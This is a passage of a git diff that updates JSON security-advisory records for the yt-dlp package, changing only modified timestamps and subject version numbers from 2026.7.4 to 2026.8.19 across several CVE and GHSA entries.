"2026.7.4", - "key": "upstream:pkg:pypi/yt-dlp@2026.7.4" + "subject_version": "2026.8.19", + "key": "upstream:pkg:pypi/yt-dlp@2026.8.19" }, { "strategy": "distro", diff --git a/advisories/BREW-yt-dlp-CVE-2026-50023.json b/advisories/BREW-yt-dlp-CVE-2026-50023.json index bcb4dc334c5..79d78ceb8ae 100644 --- a/advisories/BREW-yt-dlp-CVE-2026-50023.json +++ b/advisories/BREW-yt-dlp-CVE-2026-50023.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-yt-dlp-CVE-2026-50023", "published": "2026-08-13T17:55:05Z", - "modified": "2026-08-13T17:55:05Z", + "modified": "2026-08-22T09:53:02Z", "upstream": [ "CVE-2026-50023", "GHSA-c6mh-fpjc-4pr3", @@ -44,22 +44,22 @@ "strategy": "git", "ecosystem": "GIT", "name": "https://github.com/yt-dlp/yt-dlp", - "subject_version": "2026.7.4", + "subject_version": "2026.8.19", "key": "https://github.com/yt-dlp/yt-dlp" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "yt-dlp", - "subject_version": "2026.7.4", - "key": "pkg:pypi/yt-dlp@2026.7.4" + "subject_version": "2026.8.19", + "key": "pkg:pypi/yt-dlp@2026.8.19" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "yt-dlp", - "subject_version": "2026.7.4", - "key": "pkg:pypi/yt-dlp@2026.7.4" + "subject_version": "2026.8.19", + "key": "pkg:pypi/yt-dlp@2026.8.19" }, { "strategy": "distro", @@ -71,15 +71,15 @@ "strategy": "distro", "ecosystem": "GIT", "name": "https://github.com/yt-dlp/yt-dlp", - "subject_version": "2026.7.4", + "subject_version": "2026.8.19", "key": "upstream:https://github.com/yt-dlp/yt-dlp" }, { "strategy": "distro", "ecosystem": "PyPI", "name": "yt-dlp", - "subject_version": "2026.7.4", - "key": "upstream:pkg:pypi/yt-dlp@2026.7.4" + "subject_version": "2026.8.19", + "key": "upstream:pkg:pypi/yt-dlp@2026.8.19" }, { "strategy": "distro", diff --git a/advisories/BREW-yt-dlp-CVE-2026-50574.json b/advisories/BREW-yt-dlp-CVE-2026-50574.json index 383e47369e4..cf076fa6afe 100644 --- a/advisories/BREW-yt-dlp-CVE-2026-50574.json +++ b/advisories/BREW-yt-dlp-CVE-2026-50574.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-yt-dlp-CVE-2026-50574", "published": "2026-08-13T17:55:05Z", - "modified": "2026-08-13T17:55:05Z", + "modified": "2026-08-22T09:53:02Z", "upstream": [ "CVE-2026-50574", "GHSA-vx4q-3cr2-7cg2", @@ -44,22 +44,22 @@ "strategy": "git", "ecosystem": "GIT", "name": "https://github.com/yt-dlp/yt-dlp", - "subject_version": "2026.7.4", + "subject_version": "2026.8.19", "key": "https://github.com/yt-dlp/yt-dlp" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "yt-dlp", - "subject_version": "2026.7.4", - "key": "pkg:pypi/yt-dlp@2026.7.4" + "subject_version": "2026.8.19", + "key": "pkg:pypi/yt-dlp@2026.8.19" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "yt-dlp", - "subject_version": "2026.7.4", - "key": "pkg:pypi/yt-dlp@2026.7.4" + "subject_version": "2026.8.19", + "key": "pkg:pypi/yt-dlp@2026.8.19" }, { "strategy": "distro", @@ -71,15 +71,15 @@ "strategy": "distro", "ecosystem": "GIT", "name": "https://github.com/yt-dlp/yt-dlp", - "subject_version": "2026.7.4", + "subject_version": "2026.8.19", "key": "upstream:https://github.com/yt-dlp/yt-dlp" }, { "strategy": "distro", "ecosystem": "PyPI", "name": "yt-dlp", - "subject_version": "2026.7.4", - "key": "upstream:pkg:pypi/yt-dlp@2026.7.4" + "subject_version": "2026.8.19", + "key": "upstream:pkg:pypi/yt-dlp@2026.8.19" }, { "strategy": "distro", diff --git a/advisories/BREW-yt-dlp-CVE-2026-55404.json b/advisories/BREW-yt-dlp-CVE-2026-55404.json index 625981ad6a8..9033d9291b7 100644 --- a/advisories/BREW-yt-dlp-CVE-2026-55404.json +++ b/advisories/BREW-yt-dlp-CVE-2026-55404.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-yt-dlp-CVE-2026-55404", "published": "2026-08-13T17:55:05Z", - "modified": "2026-08-13T17:55:05Z", + "modified": "2026-08-22T09:53:02Z", "upstream": [ "CVE-2026-55404", "GHSA-6v4j-43gg-vj32", @@ -44,22 +44,22 @@ "strategy": "git", "ecosystem": "GIT", "name": "https://github.com/yt-dlp/yt-dlp", - "subject_version": "2026.7.4", + "subject_version": "2026.8.19", "key": "https://github.com/yt-dlp/yt-dlp" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "yt-dlp", - "subject_version": "2026.7.4", - "key": "pkg:pypi/yt-dlp@2026.7.4" + "subject_version": "2026.8.19", + "key": "pkg:pypi/yt-dlp@2026.8.19" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "yt-dlp", - "subject_version": "2026.7.4", - "key": "pkg:pypi/yt-dlp@2026.7.4" + "subject_version": "2026.8.19", + "key": "pkg:pypi/yt-dlp@2026.8.19" }, { "strategy": "distro", @@ -71,15 +71,15 @@ "strategy": "distro", "ecosystem": "GIT", "name": "https://github.com/yt-dlp/yt-dlp", - "subject_version": "2026.7.4", + "subject_version": "2026.8.19", "key": "upstream:https://github.com/yt-dlp/yt-dlp" }, { "strategy": "distro", "ecosystem": "PyPI", "name": "yt-dlp", - "subject_version": "2026.7.4", - "key": "upstream:pkg:pypi/yt-dlp@2026.7.4" + "subject_version": "2026.8.19", + "key": "upstream:pkg:pypi/yt-dlp@2026.8.19" }, { "strategy": "distro", diff --git a/advisories/BREW-yt-dlp-GHSA-3v33-3wmw-3785.json b/advisories/BREW-yt-dlp-GHSA-3v33-3wmw-3785.json index 59f23cd5f04..bf8f6f528f4 100644 --- a/advisories/BREW-yt-dlp-GHSA-3v33-3wmw-3785.json +++ b/advisories/BREW-yt-dlp-GHSA-3v33-3wmw-3785.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-yt-dlp-GHSA-3v33-3wmw-3785", "published": "2026-08-13T17:55:05Z", - "modified": "2026-08-13T17:55:05Z", + "modified": "2026-08-22T09:53:02Z", "upstream": [ "GHSA-3v33-3wmw-3785" ], @@ -42,8 +42,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "yt-dlp", - "subject_version": "2026.7.4", - "key": "pkg:pypi/yt-dlp@2026.7.4" + "subject_version": "2026.8.19", + "key": "pkg:pypi/yt-dlp@2026.8.19" } ] }, diff --git a/advisories/BREW-yt-dlp-GHSA-69qj-pvh9-c5wg.json b/advisories/BREW-yt-dlp-GHSA-69qj-pvh9-c5wg.json index 3f6dde9e45f..19facf408fc 100644 --- a/advisories/BREW-yt-dlp-GHSA-69qj-pvh9-c5wg.json +++ b/advisories/BREW-yt-dlp-GHSA-69qj-pvh9-c5wg.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-yt-dlp-GHSA-69qj-pvh9-c5wg", "published": "2026-08-13T17:55:05Z", - "modified": "2026-08-13T17:55:05Z", + "modified": "2026-08-22T09:53:02Z", "upstream": [ "GHSA-69qj-pvh9-c5wg" ], @@ -42,8 +42,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "yt-dlp", - "subject_version": "2026.7.4", - "key": "pkg:pypi/yt-dlp@2026.7.4" + "subject_version": "2026.8.19", + "key": "pkg:pypi/yt-dlp@2026.8.19" } ] },